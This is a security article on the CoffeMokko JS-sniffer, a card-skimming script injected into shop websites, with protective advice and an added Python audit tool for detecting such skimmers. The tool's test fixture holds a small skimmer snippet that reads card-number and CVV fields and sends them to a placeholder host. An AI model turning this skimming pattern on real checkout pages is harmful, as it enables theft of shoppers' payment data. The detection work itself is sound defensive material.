
CoffeMokko JS-sniffer

Posted: April 6, 2019

The CoffeMokko JS-sniffer is a family of Trojan sniffers that collect credit card credentials and other information during website purchases. Each member of this family is customized for a particular website, which the remote attacker compromises through methods such as brute-forcing logins or exploiting software vulnerabilities. Both customers and website administrators can use traditional means of self-defense and should have anti-malware solutions ready for deleting the CoffeMokko JS-sniffer or stopping its theft.

A Sniff of Coffee-Scented Transaction Troubles

A substantial family of Trojan sniffers, with attacks potentially impacting hundreds of thousands of Web shoppers, is starting to come under meaningful investigation in spring of 2019. The CoffeMokko JS-sniffer is competitive with other website vendor-based data collectors, such as the MagentoName JS-sniffer, although it uses a possibly inefficient campaign model. For reasons best known to themselves, the threat actors deploying the CoffeMokko JS-sniffer develop a new variant for each of the websites that they compromise.

Like competing Trojan sniffers, the CoffeMokko JS-sniffer is inserted into the website's code after the remote attackers gain access to it, whether by brute-forcing the login or by other methods such as exploiting unpatched software vulnerabilities. As its name suggests, the CoffeMokko JS-sniffer misuses JavaScript features to conduct its attacks, which capture transaction data from any shoppers that use the now-infected site. Malware analysts can confirm that at least some versions of the CoffeMokko JS-sniffer also use obfuscation to keep these scripts from being recognized as threats.

Members of the CoffeMokko JS-sniffer family use hard-coded options for capturing the targeted information, which is possibly one explanation for why new revisions appear continuously. Instead of targeting a general CMS platform like Magento, the CoffeMokko JS-sniffer concentrates on the data entry fields of well-known payment processors, such as Authorize.net, PayPal, Stripe, Verisign and similar services. In doing so, it seamlessly collects passwords, credit card information and other credentials during the purchase. Currently, malware experts' sources estimate that infections attributable to the CoffeMokko JS-sniffer account for just over ten percent of the payment systems industry.

Waving a Bitter Aroma out of Web Browsers

Web shoppers can monitor their PayPal accounts and other finances for any disruptions that would signify a threat actor's having access, such as an unexplained purchase. As a secondary, limited precaution, malware experts also advise disabling features like JavaScript when possible, which lowers the chances of browser-based attacks from various sources, including those of a Trojan sniffer. Always respond to a potential compromise by contacting the appropriate companies, canceling credit cards, and changing login and authentication information for the relevant accounts.

Server administrators should abide by the usual practices for keeping their sites from being at risk of attacks that would introduce the CoffeMokko JS-sniffer, or other threats, into the website's code. Updating software infrastructure will patch most of the vulnerabilities that a threat actor could abuse, and using secure logins will remove most of the risk of a brute-force attack. Anti-malware products offering website-analysis services should delete the CoffeMokko JS-sniffer's variants if there has already been a compromise.
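The two points above, sniffers that hook a shop's payment fields (often obfuscated and sending data off-site) and administrators who should be analysing their site's code for such injections, can be combined into one practical check: keep a hash baseline of the JavaScript a site serves, and run a triage pass over anything that is new or has changed since the baseline. The script below is an added example for this article, not code from the page, from any vendor, or from CoffeMokko samples; its heuristics (payment-field names, form submit hooks, outbound calls, string-escape and decoder usage, hosts outside an allowlist) are generic traits of form-skimming scripts, and the trusted-host list, the baseline, and both sample scripts are constructed for the demonstration.

```python
"""Static triage of a web shop's JavaScript (added example, not from the article).

Flags scripts that differ from a known-good hash baseline and that show the
three core traits of a payment sniffer: reading payment fields, hooking the
form, and sending data out. Obfuscation and unknown hosts raise the score.
The indicators are generic and are NOT signatures of CoffeMokko itself.
"""
import hashlib
import re
from urllib.parse import urlparse

# Constructed allowlist: hosts a checkout page is expected to contact.
TRUSTED_HOSTS = {"shop.example", "api.stripe.com", "www.paypal.com"}

# Generic indicator patterns (assumptions for this example, tune per site).
PAYMENT_FIELD_RE = re.compile(r"(card[_-]?number|ccnum|cvv|cvc|exp(iry|_month|_year|date)|cardholder)", re.I)
FORM_HOOK_RE = re.compile(r"(addEventListener\s*\(\s*['\"](submit|click|change|keyup)|\.onsubmit|\bonclick\b)")
EXFIL_RE = re.compile(r"(XMLHttpRequest|fetch\s*\(|sendBeacon|new\s+Image\s*\(|\.src\s*=)")
OBFUSCATION_RE = re.compile(r"(\\x[0-9a-f]{2}|atob\s*\(|String\.fromCharCode|unescape\s*\(|eval\s*\()", re.I)
URL_RE = re.compile(r"https?://[A-Za-z0-9.-]+")


def sha256(text):
    """Hex digest used for the served-script baseline."""
    return hashlib.sha256(text.encode()).hexdigest()


def external_hosts(script):
    """Hosts referenced by absolute URLs that are not on the allowlist."""
    return {urlparse(u).hostname for u in URL_RE.findall(script)} - TRUSTED_HOSTS


def triage(script):
    """Score one script; 'suspicious' requires all three core sniffer traits."""
    hits = {
        "payment_fields": len(PAYMENT_FIELD_RE.findall(script)),
        "form_hooks": len(FORM_HOOK_RE.findall(script)),
        "exfil_calls": len(EXFIL_RE.findall(script)),
        "obfuscation": len(OBFUSCATION_RE.findall(script)),
    }
    unknown = external_hosts(script)
    core = sum(1 for k in ("payment_fields", "form_hooks", "exfil_calls") if hits[k])
    score = core + (1 if hits["obfuscation"] else 0) + (1 if unknown else 0)
    return {"hits": hits, "unknown_hosts": sorted(unknown), "score": score,
            "suspicious": core == 3}


def audit(site_scripts, baseline):
    """Compare served scripts (path -> body) with a baseline (path -> sha256);
    triage everything that is new or modified, skip unchanged files."""
    findings = []
    for path, body in site_scripts.items():
        digest = sha256(body)
        if path not in baseline:
            status = "new"
        elif baseline[path] != digest:
            status = "modified"
        else:
            continue
        findings.append({"path": path, "status": status, **triage(body)})
    return findings


# Constructed sample: a legitimate checkout script talking to a trusted host.
CLEAN_CHECKOUT_JS = """
document.getElementById('checkout').addEventListener('submit', function (e) {
  e.preventDefault();
  fetch('https://api.stripe.com/v1/tokens', {method: 'POST', body: new FormData(e.target)});
});
"""

# Constructed test fixture with sniffer-like traits (inert: .invalid host, no real page).
SKIMMER_LIKE_JS = r"""
var q=document.getElementById;var d=document;
d.forms[0].addEventListener('submit',function(){
 var p=q.call(d,'card_number').value+'|'+q.call(d,'\x63vv').value;
 new Image().src='https://collector.invalid/p?'+btoa(p);});
"""

# Constructed baseline: checkout.js is known-good; vendor.js had a different hash before.
BASELINE = {"/js/checkout.js": sha256(CLEAN_CHECKOUT_JS), "/js/vendor.js": "0" * 64}
SITE_SCRIPTS = {"/js/checkout.js": CLEAN_CHECKOUT_JS, "/js/vendor.js": SKIMMER_LIKE_JS}

if __name__ == "__main__":
    for f in audit(SITE_SCRIPTS, BASELINE):
        flag = "SUSPICIOUS" if f["suspicious"] else "review"
        print(f"{f['path']}: {f['status']}, score {f['score']}, {flag}, "
              f"unknown hosts {f['unknown_hosts']}, hits {f['hits']}")
```

Run on the constructed site, only `/js/vendor.js` is reported: it changed since the baseline and carries all three core traits plus an escape sequence and an unlisted host, while the unchanged `checkout.js` is never re-scanned. The verdict deliberately requires all three core traits, so a legitimate script that merely posts a form to a trusted processor is not flagged; in practice the baseline would be regenerated from a clean deploy and the triage run on every fetch of the live pages.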

The lesson of the Trojan sniffer is that a threat left alone will, inevitably, grow into a profitable problem for black hat enterprises. The CoffeMokko JS-sniffer is a strong example of that inevitability and may come with more surprises, considering its variation-prone development.
